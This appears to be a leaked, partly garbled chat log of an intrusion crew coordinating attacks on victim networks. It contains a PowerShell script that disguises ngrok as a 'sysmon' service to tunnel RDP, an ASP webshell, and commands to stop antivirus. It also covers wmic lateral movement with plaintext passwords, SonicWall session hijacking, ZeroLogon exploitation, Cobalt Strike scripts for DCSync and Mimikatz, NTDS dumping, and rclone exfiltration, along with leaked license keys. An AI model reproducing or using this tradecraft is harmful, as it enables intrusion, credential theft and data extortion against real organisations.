ok. wait 10-15 minutes. i will hook you up with someone else. hi, i remember. got any work to do for practice? and the vpn's about to be stripped downgotbots are here1.com@all beep, who worked with hashtag, dictionaries. 
need a little advice@atom write eldorado he might know@Airzaley fucking data we're trying to make money on this, seriously?it is not re-scheduled what? transferred? if so - add please @jask where did you pour? do not see on the server can:) thought myself in the code lost / lost)) A) written script lost. I udmay have asked) \and what lost? Got it, thanks.Yes, I wrote, lost.create a database where NTLM is the id, and match the Googling, tons of options...write a script, a simple one, whatever, there are 3-5 lines of comparison and matching...Gentlemen, advise me, maybe there is a solution not by hand. I have two files. First one with lots of lines in format `USER:NTLM`, second one with less number of lines in format `NTLM:PASSWORD`. How to combine what would end up being `USER:PASS`? = )well yeah you can do that with psyngect, is there any compiled software on sharps? and what's this for? it turns out no one is listening to me so I'll say it again to all of you with eyes and ears before locking up, use the home run session gopher https://github.com/Arvanaghi/SessionGopher To run remotely (-iL, -AllDomain, -Target) dump @steven in pmpom help with hash: d62fdc9dfa81e87e27baa523266bd3e2 thanks)@t3chnolog sorry, didn't know. My respects! 
:) when you hang the service console output does not ktokno kmd opens when you just start Ngrok, this is the usual console outputThis is my script tastemtanapis in pm)Under yourself, just change the need, if you do not understand - beep PM, I will help you.`` mkdir "C:\Windows\tmp" # Download NGROK $clnt = new-object System.Net.WebClient $url = "https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip" $file = "C:\Windows\tmp\ngrok.zip" $clnt.DownloadFile($url,$file) # Unzip NGROK $shell_app=new-object -com shell.application $zip_file = $shell_app.namespace($file) $destination = $shell_app.namespace("C:\Windows\tmp\") $destination.Copyhere($zip_file.items()) #Download NSSM $clnt = new-object System.Net.WebClient $url = "http://nssm.cc/release/nssm-2.24.zip" $file = "C:\Windows\tmp\nssm.zip" $clnt.DownloadFile($url,$file) #Unzip NSSM $shell_app=new-object -com shell.application $zip_file = $shell_app.namespace($file) $destination = $shell_app.namespace("C:\Windows\tmp") $destination.Copyhere($zip_file.items()) Rename-Item -Path "C:\Windows\tmp\ngrok.exe" -NewName "sysmon.exe" echo 'authtoken: 1nkQQQOeCRwXSyjxVs1jCOvlQ6XQ_s2fbYS124PZwt36bUVP5 tunnels: default: proto: tcp addr: 3389' > "C:\Windows\tmp\config.yml" cd "C:\Windows\tmp\nssm-2.24\win64" .\nssm.exe install sysmon C:\Windows\tmp\sysmon.exe start --all --region us --config="C:\Windows\tmp\config.yml" Start-Service sysmon ``` I have a connection to the ngp in the background, when I start the output in the cmd, and when you close the tunnel falls, and so should it be? @all write in confes where to reshoot the session, now we will try wait above )):rocket:hey all. someone rolled up a veeam on a dedicated? pm plz $50k BTC-USD, gentlemen! :)Gentlemen, good evening everyone! Has anyone encountered Datto? has anyone worked through ipv6? and what are the legitimate ways to remove ntds now? i usually run through exchange. 
One of the most survivable backdoors. no php there. I don't know about the obfuscated code, it will probably work, I don't know how to do it. is obfuscated code also dumped? often on servers with aspx, maybe pxp is up there, you can also dump a pxp webshell...thanks check it out again i've solved this problem long ago - i used a legitimate file explorer, and then i uploaded the one that is not stolen by the aver I'm looking for the easiest way which will be close to fudumassa options http://github.com/tennc/webshell/tree/master/asrprosto also never worked with ASP, but judging by the context so...well you need to pass the command parameters, like cmd=dirS ASP not worked, but apparently yes.Who knows a little about ASP coding? ``` <% eval request("cmd") %> ``` Is this code just GET / POST code in CMD? thanks pm@all have a working email on proton? "C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\smc.exe" -stop tried it yesterday, it asked for password@all please note it does not work like that anymore = ( the old bug - removed khadyCrowdStrike pomoymu change the name of the dir and rebootSimantec command abovedefender gpok as AV stew listen and ask pliz notes hisponyal - ok) asked what would not screw up servaks) spasibparu days hangs all is wellvse window comepara new servers on the new profileParni, all hi! Was the topic that flew sessions kgbschih. At the time when it was massive, I bypassed, and now flies - a terrible nuisance. Solved by changing the profile? Or I remembered something wrong with the password is extinguished as follows. ``"C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\smc.exe" -stop ``Has anybody had any experience with removing ntds from the nix cd? I'm sorry I misunderstood. I don't need templates. What exactly do I need to download? 
can somehow, but I did not understand, usually the tool does itopolyubomu they human-like and similar to those we have a pool of similar passwords I mean if you give the program a pool of characters and similar passwords and it will search by pattern + passwords that in Chrome from the administrator you stole passwordsobviously helps passwords from nds decrypt and search 1-2 thousand passwords there hashes for 4 days on brute force and hashkatkonno from there exports hashkdb who knows any password rebuilders for jdb Duo Security bypassed in the end ? hello, has anyone encountered a Cortex XDR ? Monitoring some kind of av , blocks everything in a row , any activity in the network . Can bring it down can be how then, cut off even the white software to close the processjeremytonylexmanternert3chnologichelloworld123@rozetka from here look. remote-exec did not have time to try) the problem was in DA, namely on these servers, he did not work for some reason, change the token to another DA and all norm started and knocked off) tried remote-exec ? set command cmd /c ping google.com hmmm maybe the problem is in the pc from which I launch vmik or task, it writes access denied when executed ... how to ping another server on google com or netstat?) Previously done through a task or vmik, threw at the desired server batinny with the commands and the output in txt, but now it does not work, there is still some other option?) This is your server, where you want to get. pinging google com or netstat snimeya sorry read wrong wmic and task does not work, I'm trying to remotely run on another pc to run there bilds indication of the kred just no accessa server look outside? shell wmic /node:192.168.0.6 /user:Administrator /password:Blue22Sky@@ etcHelp) I want to run koba on other servers, before that was fine, but on one where sql database does not give. 
Run through wmic and through the task error no access ERROR: Description = Access is denied. The token is from YES and I can access all the disks safely What's that got to do with it? I'm gonna have to tell you, they scanned it or something. fort fuckin' blocked it. still nothing nothing can be done yet ``Fort with a default route, someone can tell me how to do it, they say it might help`` route add 192.168.0.0 mask 255.255.0.0 IF 19 Try it this way If that doesn't work route add 192.168.0.0 mask 255.255.0.0 10.212.134.110 IF 19 p\s this one doesn't work``. C:\Users\Administrator>netsh interface ipv4 show interfaces Idx Met MTU State Name --- ---------- ---------- ------------ --------------------------- 1 50 4294967295 connected Loopback Pseudo-Interface 1 12 5 1500 disconnected Ethernet 13 5 1500 disconnected Ethernet 2 14 20 1500 connected Ethernet 3 15 5 1500 disconnected Ethernet 4 18 20 1500 disconnected Ethernet 5 19 1 1392 connected Ethernet 6 C:\Users\Administrator> `````` C:\Users\Administrator>ipconfig /all Windows IP Configuration Host Name: front1 Primary Dns Suffix: Node Type: Hybrid IP Routing Enabled: No WINS Proxy Enabled: No DNS Suffix Search List: Ethernet adapter Ethernet 6: Connection-specific DNS Suffix: Description: Fortinet SSL VPN Virtual Ethernet Adapter Physical Address: 00-09-0F-AA-00-01 DHCP Enabled: No Autoconfiguration Enabled: Yes Link-local IPv6 Address: fe80::4cf6:80d9:8658:d4bc%19(Preferred) IPv4 Address: 10.212.134.110(Preferred) Subnet Mask: 255.255.255.255 Default Gateway: DHCPv6 IAID: 671090959 DHCPv6 Client DUID: 00-01-00-01-27-05-06-6F-00-25-90-57-E5-8C DNS Servers: 192.168.1.40 192.168.1.18 NetBIOS over Tcpip: Enabled Ethernet adapter Ethernet 5: Media State: Media disconnected Connection-specific DNS Suffix: Description: Fortinet Virtual Ethernet Adapter (NDIS 6.30) Physical Address: 00-09-0F-FE-00-01 DHCP Enabled: Yes Autoconfiguration Enabled: Yes Ethernet adapter Ethernet 4: Media State: Media disconnected Connection-specific DNS Suffix: Description: Intel(R) 82574L Gigabit Network Connection #4 Physical Address: 00-25-90-57-E5-8D DHCP Enabled: Yes Autoconfiguration Enabled: Yes Ethernet adapter Ethernet 3: Connection-specific DNS Suffix: Description: Intel(R) 82574L Gigabit Network Connection #3 Physical Address: 00-25-90-57-E5-8A DHCP Enabled: No Autoconfiguration Enabled: Yes Link-local IPv6 Address: fe80::31f5:3b79:943a:4573%14(Preferred) IPv4 Address: 199.241.189.38(Preferred) Subnet Mask: 255.255.255.252 Default Gateway: 199.241.189.37 DHCPv6 IAID: 436217232 DHCPv6 Client DUID: 00-01-00-01-27-05-06-6F-00-25-90-57-E5-8C DNS Servers: 192.168.1.40 192.168.1.18 8.8.8.8 8.8.4.4 NetBIOS over Tcpip: Enabled Ethernet adapter Ethernet 2: Media State: Media disconnected Connection-specific DNS Suffix: Description: Intel(R) 82574L Gigabit Network Connection #2 Physical Address: 00-25-90-57-E5-8B DHCP Enabled: Yes Autoconfiguration Enabled: Yes Ethernet adapter Ethernet: Media State: Media disconnected Connection-specific DNS Suffix: Description: Intel(R) 82574L Gigabit Network Connection Physical Address: 00-25-90-57-E5-8C DHCP Enabled: Yes Autoconfiguration Enabled: Yes Tunnel adapter isatap.{E36713F6-455F-40D0-AB94-C1C24C36EF31}: Media State: Media disconnected Connection-specific DNS Suffix: Description: Microsoft ISATAP Adapter Physical Address: 00-00-00-00-00-00-00-E0 DHCP Enabled: No Autoconfiguration Enabled: Yes Tunnel adapter 6TO4 Adapter: Connection-specific DNS Suffix: Description: Microsoft 6to4 Adapter Physical Address: 00-00-00-00-00-00-00-E0 DHCP Enabled: No Autoconfiguration Enabled: Yes IPv6 Address: 2002:c7f1:bd26::c7f1:bd26(Preferred) Default Gateway: 2002:c058:6301::1 DHCPv6 IAID: 587202560 DHCPv6 Client DUID: 00-01-00-01-27-05-06-6F-00-25-90-57-E5-8C DNS Servers: 192.168.1.40 192.168.1.18 8.8.8.8 8.8.4.4 NetBIOS over Tcpip: Disabled Tunnel adapter isatap.{A623B785-E644-477C-BB93-A087554D1E25}: Media State: Media disconnected Connection-specific DNS Suffix: Description: Microsoft ISATAP Adapter #2 Physical Address: 00-00-00-00-00-00-00-E0 DHCP Enabled: No Autoconfiguration Enabled: Yes C:\Users\Administrator> `````` C:\Users\Administrator>route print =========================================================================== Interface List 19...00 09 0f aa 00 01 ......Fortinet SSL VPN Virtual Ethernet Adapter 18...00 09 0f fe 00 01 ......Fortinet Virtual Ethernet Adapter (NDIS 6.30) 15...00 25 90 57 e5 8d ......Intel(R) 82574L Gigabit Network Connection #4 14...00 25 90 57 e5 8a ......Intel(R) 82574L Gigabit Network Connection #3 13...00 25 90 57 e5 8b ......Intel(R) 82574L Gigabit Network Connection #2 12...00 25 90 57 e5 8c ......Intel(R) 82574L Gigabit Network Connection 1...........................Software Loopback Interface 1 16...00 00 00 00 00 00 e0 Microsoft ISATAP Adapter 17...00 00 00 00 00 00 e0 Microsoft 6to4 Adapter 21...00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #2 =========================================================================== IPv4 Route Table =========================================================================== Active Routes: Network Destination Netmask Gateway Interface Metric 0.0.0.0 0.0.0.0 199.241.189.37 199.241.189.38 40 10.212.134.110 255.255.255.255 On-link 10.212.134.110 257 64.244.144.91 255.255.255.255 199.241.189.37 199.241.189.38 20 127.0.0.0 255.0.0.0 On-link 127.0.0.1 306 127.0.0.1 255.255.255.255 On-link 127.0.0.1 306 127.255.255.255 255.255.255.255 On-link 127.0.0.1 306 192.168.1.2 255.255.255.255 10.212.134.111 10.212.134.110 1 192.168.1.16 255.255.255.255 10.212.134.111 10.212.134.110 1 199.241.189.36 255.255.255.252 On-link 199.241.189.38 276 199.241.189.38 255.255.255.255 On-link 199.241.189.38 276 199.241.189.39 255.255.255.255 On-link 199.241.189.38 276 224.0.0.0 240.0.0.0 On-link 127.0.0.1 306 224.0.0.0 240.0.0.0 On-link 199.241.189.38 276 224.0.0.0 240.0.0.0 On-link 10.212.134.110 257 255.255.255.255 255.255.255.255 On-link 127.0.0.1 306 255.255.255.255 255.255.255.255 On-link 199.241.189.38 276 255.255.255.255 255.255.255.255 On-link 10.212.134.110 257 =========================================================================== Persistent Routes: Network Address Netmask Gateway Address Metric 0.0.0.0 0.0.0.0 199.241.189.37 20 =========================================================================== IPv6 Route Table =========================================================================== Active Routes: If Metric Network Destination Gateway 17 1041 ::/0 2002:c058:6301::1 1 306 ::1/128 On-link 17 1010 2002::/16 On-link 17 266 2002:c7f1:bd26::c7f1:bd26/128 On-link 14 276 fe80::/64 On-link 19 261 fe80::/64 On-link 14 276 fe80::31f5:3b79:943a:4573/128 On-link 19 261 fe80::4cf6:80d9:8658:d4bc/128 On-link 1 306 ff00::/8 On-link 14 276 ff00::/8 On-link 19 261 ff00::/8 On-link =========================================================================== Persistent Routes: None C:\Users\Administrator> ``The task is to skip ngrok for further pumping of information.`` Guys, this is my case. But a question for everyone. I have fortic works , pps with white ipac. But not a single server is not climbing and not one server is not pinged. I tried to change the ip address manually but said I have it all right. 
How to be an idea ?Guys, this is my case. But a question for everyone. I have a fortic is working , pps with a white ipac. But no one server does not get on and no one server is not pinged. I tried to change the ip address manually but said I have it all right. How to be there are ideas ?Or how prabota this column sesionsda need 1 time to win and then there will be no problem) and work through the rdzhedtoneel just quit canokhek through an hour will be, I can look for more detailsperezvali options and looked for errors on their side changed the kobua I and the domain and without trying to blacklist domains mb.Hello all!!! Guys need your advice. There is a network - the central point is organized through the VPN. In the network AV WEBROOT + DEF. I scanned the network - chose the server machines and flew there. I let the encrypted DLL - no knock. Turning off WEBROOT and DEF. I fired up a SE - no hits. Exe - no hits. Checking everything on the other network - everything is OK! I think maybe Ip do not like it. I change the cobu (without the certificate). I generate pailoads, I start them up, all bypassed. Target machine is looking at the internet. I also disable firewall. I change the target machine - repeat steps and all without result. Questions: 1. Why can this happen? 2. What should I do about it? 3. What other options are there for getting a session? wait for rollback on bitok :) thank you) hit the normal on pp) super) here's another showed ip norm) recently the situation was 1v1 - alt figured out that the conflict of local addresses. optimal - take a VPN with a white apache and clinga another ns server?specify sohostname.domain.comfull hostname.comfull hostname.plskin whatever host entered that he is not in the domain) probably have to enter the rdp in the domain still? 
thank you try to ask the hostname IP from the dns server 10 2 160 19 then climb on it so there is with the adfinder dns names only, trying to find out ip to ping, no ping) there are also a few ip, they pinged, but do not connect to the rip ``nslookup HOSTNAME 10.2.160.19 ``Can you get on a host some so podpodney session or by rndp go to the server quiet and do things =)adfind should be removed from the context of the domain or specify a creed + dk server knocked out suchvpn itself 10.129.25.5 in the local 10.2.160.X go yes it dns in a local case that you attack ? `` DNS Servers . . . . . . . . : 10.2.160.19 10.118.160.201 ``din.local is not the domain you're looking for by ipconfig /all ``Hello, I wanted to clarify this question, there is an rdp and vpn from the network. I connect to this rdp to the VPN, all normal connects, run the coba immediately, knocking it off with the ipn vpn. But the server from the adfinder including DK does not ping and does not jump anywhere, in this case, need to enter this rdp in the domain? luna@all content from the folder LLVM overwrite the contents of the folder brooks-artifact-kit entry points for rundll32.exe for generated dlls ``` DllRegisterServer DllInstall DllUnregisterServer Control_RunDLL ``Bug@all all this stuff is in one script, please check functionality and make corrections if possible. If you find or come across something else interesting - add it, I will add it to a common set. But ONLY what uses cobalt's native functionality, only .CNA files without any extra scripts, otherwise we'll clutter up everything here. ``` ## AV_Query AV_Query scans the registry for installed antiviruses ## upload An alternate version of the upload command. Uploads a local file (first argument) to a remote host (second argument, optional). How to use: __upload [/remote/path/to/file]__. Example usage: __beacon> upload implant.exe \\DC1\c$\\windows\temp\implant.exe__. ## Blacklist Blacklist for bacon. 
Deletes bacon if it is running on a computer where the username and computer are contained in the blacklist. __blacklist-add__ - add to blacklist __blacklist-remove__ - remove from the blacklist. __blacklist-show__ - show blblacklist ## Credpocalypse Tracks bacon and collects credentials Bacon usage: __begin_credpocalypse__ - track current bacon __end_credpocalypse [all]__ - stop tracking the current/all bacon __credpocalypse_interval [time]__ - interval of bacon polling 1m, 5m (by default), 10m, 30m, 60m Use in the script console or another script: __begin_credpocalypse__ - track all bacon __end_credpocalypse [all]__stop tracking all bacon __credpocalypse_interval [time]__ - interval of bacon polling 1m, 5m (by default), 10m, 30m, 60m Right-click on bacon to bring up the Credpocalypse menu ## powershell2 An alternate version of the powershell command with enhanced operational security ## Simple Beacon console status bar Shows the working directory, changes the width of the last bacon indicator in the lower right corner to a fixed width Adds option to cd command to return to previous directory. Usage: __cd -__ ## dcom_shellexecute Side-move with DCOM (ShellExecute) Usage: __dcom_shellexecute [target] [listener]__ to create a new bacon on target via DCOM ShellExecute object ## DebugKit Additional debugging tools in the DebugKit pop-up menu, the console script and in the bacon. 
Commands in the console script: __!beaconinfo__ - get bacon information __!loaded_powershell__ - show loaded powershell commands for each bacon __!c2_sample_server__ - show what the responses from the C2 server look like __!c2_sample_client__ - show how client requests look like __!who__ - show all people connected to timeserver __!pwn3d_hosts__ - show list of hostnames, that ever created sessions __!show_data_keys__ - show keys in Cobalt Strike data model __!query_data_key __ - get values by key from Cobalt Strike data model __!sync_all_downloads__ - synchronizes downloaded files from the Cobalt Strike server to the specified folder and recursively recreates the file paths that the files had on the target hosts Usage: __!sync_all_downloads [/path/on/client/machine/to/save/downloads/to] __ Commands in the bacon console: __!iscsadmin__ - check the current bacon via the -isadmin function ## csfm. Queries the database for known commands, outputs useful tips for the operator. Syntax: __csfm [List]__ - listing all csfm options Example: __search computer, tip ntlm__ ## EDR. Remotely polls the system for EDR products Syntax: __edr_query [hostname] [arch]__ ## Color Coded Files Listing The script colors the output of the ls command and lets you see the downloaded files by highlighting them ## Forwarded_Ports Tracks configured remote port forwardings on all bacons and allows you to easily remove them Using 'rportfwd' quickly consumes the pool of available local ports from which outgoing traffic is forwarded, and tracking them manually becomes tedious on long projects. This script is designed to fill that gap by collecting these commands and presenting them in a nice visualization pane. ## HighLight_Beacons. Highlights new beacons in green, inactive ones in red. ## LogVis Advanced visualization of the beacon console output. ## MASS-DCSYNC DCSync attack applied to the list of domain users. The user list file must contain one user per line. 
## MIMIKATZ_ADDONS Performs a password change that allows you to change the NTLM password for a given account. Uses the Mimikatz password change feature, which allows you to change the NTLM password for a given account without registering setpassword events. **Use:** password_change [Username] [Known old hash or password] [New hash or password] [SERVER/DC/localhost] ## PING_ALIASES 1. alias **qping** sends a command line ping packet. **Use**: qping [target]. The **target** parameter is optional. 2. alias **smbscan** scans port 445. ## PORTSCAN_RESULTS Menu item under View. When launched, a tab opens with the results of the smbscan run. ## PROCESSCOLOR Highlighting process categories (antivirus, explorer, browsers, current process) in the beacon process manager (Explore => ProcessList). ## PS_WINDOW_ALIASES alias **pspane** opens the process manager. **Use:** pspane ## SLEEP_DOWN_WHEN_NO_OPERATORS Increases the sleep interval for beacons that have no active (logged in) users. ## SMART_AUTOPPID Reassigns execution of beacon commands and all beacon jobs to a designated process (svchost.exe). All commands will be executed depending on context/privileges (user or system). ** Usage:** autoppid ## WIN2012MIMIKATZ Adds a key to the registry for mimikatz to work. vampir BYI245Y52NCndjjYRhRmzagina you log in and write tweetuok now I'll give you a new account we are reorganizing not a big hello, heretut? the question is removed i forgot i already told the grid, you can see the balls there) ``https://book.hacktricks.xyz/pentesting/pentesting-smb#list-shared-folders[ ](https://stylebrooks.com/group/discussion?msg=e2yKoiESHwgaYadiD) ``net share ? ``balls gathers advansedaypiskaner normally I looked at the code shairfinder, he does not do anything particularly criminal :) and you have just 200 servo?:smiley:I throw options, no more than that) certainly not through peches fuck all the cars you want? 
but I think the technologist will not approve this method :) now I say *rozetka * thanks!it will do if you run through psekes and take output which shows what network folders on this pc there is a command do not remember shorter commandimpacket yes it works, but do not poke the same 100 + servers through smbclient.rua there is also probably not a very good way, but that's it I tried to watch it, it kicks out access denied with the context Datam by the way yes, there is a problem with no vyutam module for SMB not one there is impacket live via sokstogda pinging ipakipet view does not work in this grid )``tasklist /s HOSTNAME and the database servers will be detected without check mark \ALL I think if you uncheck the check boxes, just use eexcel to tidy up the check boxes and see all servers in bulk, no problem =) we have a couple hundred unmarked servers, we try to see where everything is) ``net view \\host net view \\host /ALL ``` first balls the second with local disks have not triggered AV ever but there is a tool not pale if for example server 2012 without amsi and we do through psyngect, is there any chance that AV will kill? anyone use sharefinder on a regular basis now? I'm wondering if it can trigger an av or network proactiveNelsons4 who has run into a backup? can i get craps from there? of course. how is it with payments? does anyone have an outlook client, preferably not a trial? i think so, but it's like putting it in the trash and there's just no deletion option?cloud backups on viam who tried to crush? account got it. and how to remove? overwrite want to try, but mb have an alternative? 
threw the keys, all activated, cp) ` `PLZ92-LYS8J-ANV3S-SZRQ7-GPG3F 5JZ6S-B3FKJ-49YYP-HCCQN-3JVHX TQZVQ-X36SC-SFZYC-TAC7E-BQF9S 2VZ8M-BYC2A-A3Y3P-6LQQ5-HNDN8 CJZXN-BWFDK-Q2Y2M-VSFCT-E7YLW 6KZ2V-A2UXK-YAWWC-YJ9QG-MW4RG RSZXG-M2YDB-R5SWQ-3XR7Z-L42PN ULZCW-2YQNG-FL83G-9DGLR-9TFQA oh well, now I'll try it) lay on picaboy did so at least, the key got up without a cocksucker google and type in mb who knows where to get? does anyone by chance have the key to the face proxyfaer?[ ] (https://stylebrooks.com/group/discussion?msg=5auyX86kHct2PnDik) gotchaThere is no such thing on this network, subconsciously immediately started looking for a new bookmark))) @ali please quote the message and not respond to the topic (the button to the left) there notifications have to closeObviously i have the ability to create bookmarks theredanu it turns out his computer is asleep just yet, if i do not kick it happily, and just do not connect? i eleventom first made a system session and it already injected another account may try but you "kick" the user will if he bookmark only on his workstation new artifact kit, all in the system does not migrate session from the admin * NetExtender Clients put, yes 2fana, no you have 2fa yes? tShow bookmarks > there's no new bookmarks? Alarm Trying to connect ... There is a problem connecting to this machine, please check it... The client could not connect to the remote computer. Remote connections might not be enabled or the computer might be too busy to accept new connections. It is also possible that network problems are preventing your connection. Please try connecting again later. If the problem continues to occur, contact your administrator. ``Work PC there what? I can't find where to add this tab. 
It feels like there's no such option in Sonicleave RDP i'm logged in there without any credentials I don't remember exactly but it was intuitively clear create new bookmark once redirected to the portal but there was no bookmark to connect to the PC Same way, if you want to make a new bookmark go straight to that SMA try to make a session under another cookie, it doesn't ask me how, it tries to connect to 127.0.0.1:8877 the connection is made from your ip to the sonic gateway and then to the virtual desktop (or physical host) the SMA should be just put on the dedication and it will connect through the localhostsorry, confused with NetExtender Clients in SMAConnect there proxy I enter: target ip, port 443, creeds? I did and then I do not know what to do) they are fresh, here we had this, as I understand it sessions died justThrough him enter creeds, 2fa sendsThrough him try to enter was secur mobile accesses client? SonicWALL - encoding the session ID in base64 ``` >> btoa ("47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg=") [ENTER] "NDdaakZLeLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0=" ``` - I put in the URL `https://target` (redirects to https://target/cgi-bin/welcome) - I add a cookie to the console ``` document.cookie="swap=NDdaakZLeDI0TmoyaDBVdFpLWDJWDPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0=" ``` - In the browser (where .../cgi-bin/welcome) I edit the URL to `https://target/cgi-bin/portal` - It takes me back to the page `https://target/cgi-bin/welcome` so for all three sessions in the Target one session once redirected to the portal, but there were no bookmarks to connect to the PC Anybody had problems with this? what did you do next? 
@rozetka @t3chnolog thanks for your help) everything started, "went ore)) "on port 80th https raise or 8443 maybe even cobalt to roll up and try it now you can just pull jobs with socks and start with another router repawn sessions do shortly I think you have a wrong configured router `tcp 0 0 185212.129.112:1000 0.0.0.0:* LISTEN 30554/ruby I thought it was fucked up) it's a server with a msfu no external IP? are you behind a NAT or something? interface to your provider's LAN andmeterpreter > ipconfig Interface 1 ============ Name : MS TCP Loopback interface Hardware MAC : 00:00:00:00:00 MTU : 1520 IPv4 Address : 127.0.0.1 Interface 65539 ============ Name : Microsoft Hyper-V Network Adapter #2 Hardware MAC : 00:15:5d:79:a8:19 MTU : 1500 IPv4 Address : 172.30.100.175 IPv4 Netmask : 255.255.255.0jobs -k number Print the socket list, take them all out and start one from the session you want mask /8 for 10.0.0.0 subnet only e.g. 172.8.240.5 what you have specified may not be recognized as a local address at all 10.0.0.0 - 10.255.255.255 (the subnet mask for classless (CIDR) addressing: 255.0.0.0 or /8) 100.64.0.0.0 - 100.127.255.255 (subnet mask 255.192.0.0 or /10) - This subnet is recommended by RFC 6598 for use as Carrier-Grade NAT (CGN) addresses. 172.16.0.0 - 172.31.255.255 (subnet mask: 255.240.0.0 or /12) 192.168.0.0 - 192.168.255.255 (subnet mask: 255.255.0.0 or /16) ``` wikipedia if the second then you first put it ``172.0.0.0/8`` this strange? or ufw disable this one google local network masks then ``72.0.0.0/8`` your subnet mask is still strange, you know? add session number what port forward and rules in ufw `` IPv4 Active Routing Table ========================= Subnet Netmask Gateway ------ ------- ------- 172.30.0.0 255.0.0.0 Session 3 172.30.100.0 240.0.0.0 Session 4 ``route print show the socket should look in the router specified? port fwd is also another and there is no port forwarding on the server do not do? 
like this add 172.30.100.0/4 4 or tryroute add 172.0.0.0.0/4 4route add 172.0.0.0/8 session 4172.30.100.0/24 and as a router prescribed in what diap should "watch"? What I forgot to miss? 1) there is a session on the server in the coba it is not spawned 2) on the server to run sox to the local host can look into the network What has been done : I prescribed the router ``` IPv4 Active Routing Table ------ ------- ------- 172.0.0.0 255.0.0.0 Session 4 ``` 2) Sox started : the port on the server opened and is listening ``` msf6 auxiliary(server/socks4a) > set srv set srvhost set srvport msf6 auxiliary(server/socks4a) > set srvhost 185.212.129.112 srvhost => 185.212.129.112 msf6 auxiliary(server/socks4a) > set srvport 1000 srvport => 1000 msf6 auxiliary(server/socks4a) > run [*] Auxiliary module running as background job 0. [*] Starting the socks4a proxy server msf6 auxiliary(server/socks4a) > netstat -antp | grep 1000 [*] exec: netstat -antp | grep 1000 tcp 0 0 185.212.129.112:1000 0.0.0.0:* LISTEN 30554/ruby msf6 auxiliary(server/socks4a) > netstat -npl [*] exec: netstat -npl Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 185.212.129.112:300 0.0.0.0:* LISTEN 555/ruby tcp 0 0 185.212.129.112:305 0.0.0.0:* LISTEN 30554/ruby tcp 0 0 185.212.129.112:1000 0.0.0.0:* LISTEN 30554/ruby ``` UFW disable I prescribe in the proxychains ip server port, trying to ping hosts from the network are not pinged.I do not know well, but mba tipsPlease write to lsnu or mba someone knows regulars (although I do not know whether this issue can be resolved through regulars)anyone worked with databases maile:pass or similar bases for the brute force? data from sharepoint / office 365 has mastered who pull? already which time I met that they store dokichom vssadmin not suitable? 
I did a snapshot, took everything, removed it, no traces, except logs) stewart Thank you. https://github.com/zcgonvh/NTDSDumpEx @t3chnolog got it, thanks! Can you recommend some other software for the decrypt, please? https://github.com/Dionach/NtdsAudit/issues/3 Gentlemen, has anyone encountered this? I just downloaded `ntds.dit` and `SYSTEM` via `psexec_ntdsgrab`, then I try to use NtdsAudit, which throws the following error `Database was not shutdown cleanly. Recovery must first be run to properly complete database operations for the previous shutdown.` prince @Air give me hell here, tomorrow there will be a full update @alter and where are the instructions) I wonder what the new tools with the context thinly but cranked up) it's like ms17 on win2008 buy a token or something domain\user make_token domain/user accounts from the remote where the VPN stretched went on and on but did not start, then the domain account took yesterday received a similar error getuid show [*] Tasked beacon to run .NET program: SharpZeroLogon.exe hopo-dc2.holly.local false check [+] host called home, sent: 114807 bytes [+] received output: Performing authentication attempts... Unable to complete server challenge. Possible invalid name or network issues?
beacon> execute-assembly C:\soft\SharpZeroLogon.exe CORIGINDC1.coalcony.com -patch [*] Tasked beacon to run .NET program: SharpZeroLogon.exe CORIGINDC1.coalcony.com -patch [+] host called home, sent: 114279 bytes [+] received output: Patching failedI had such an output I need time to test it I already sent it for rebuild We'll correct it and add to the toolchain a binary in the form of a dllcheck better sharpzerologon it is more reliable but in general we have a whip access so you can use sharpzeroLogon in the case recently was literally bumped yesterday i can't help but wonder if the problem is solved and i don't give a fuck if it's working or not, but in the log above you can see there are a couple of errors and it doesn't seem to be working either, it's about zero.the zerologon's buildcheck doesn't work for me, it's better to dotnet in the toolchain and pavnin the binary should "crawl" and then say vulnerable or nottoday i'll throw someone check zerologon was able to run? how should the result look? yes, first tried it in meteor, and later in the coba with the flags worked)usually need interactive shell additional flags can be removed if it's a software clip can not, there is no such alas, only meteor daaga, thank you, decided just through him)throw the session meterpreter there interactive shell ...aha, got it, sorry)interactive shell? as far as i know you can not,i never had to,now i have come acrossHi all, who knows if it is possible to continue a query with cmd in coba?) let's say i sent a command to a particular shell soft.exe parametr , the answer came and keep the session to send a replyok thanks, i will look at examples to portscan cobalt, syntax error probably add ` ``icmp 1024 ``Hi all! beacon> portscan 192.168.0.0/24 445 [*] Tasked beacon to scan ports 445 on 192.168.0.0/24 [+] host called home, sent: 93245 bytes [+] received output: Scanner module is complete Why can this happen? The scan ends right away. 
The range is exactly like this ``-size 10 -p \\host\share`` Is it possible to distribute threads in the locker somehow to connected balls?) Increase them so that balls start locating faster without using the mega client) and event triggers are the same (if configured), the main thing is that the signature is not detected on this, all the same as when using the desktop mega client I think for this reason what? in larder cortices this thing will be stolen, right? can be immediately improved) it was originally installed through the rdp, from the user. and to work through the coba, from system, the rclone must point to config C:\Users\user\.config\rclone\rclone.conf and i still can not find the path. i tried to mount a disk, but it did not work. that's how it is with me) only if the session from the admin is open through the rdp, then it will only be happy xm I've tried to open a session with an admin. when using it, write if something is missing in the functionality, we'll finalize it) tried it, normal tool) thank you, now really no need to get into the rdp cool, thank you it is generally convenient, immediately after the ball put all the fs to scan and went to do things) normal stuff should look only I have through the coba did not get something to copy aha)))) heh heh okay it means colleagues work with it, ok) we are also in business then) articles about it, just started to use it as I understand it ``Egregor RaaS Continues the Chaos with Cobalt Strike and Rclone`` Is the http protocol on any port in the process? how is it visible/not visible in the system after installing, what protocol? in 50 minutes 10gb download do it for coba) https://github.com/rclone/rclone here's more of a guide on it Hi all! Those who download files and everyone will find it useful! Very cool thing, RCLONE now there is no need to unzip mega files! everything is very quiet and unnoticeable! I do not know how to describe it) download rclone from the official site.
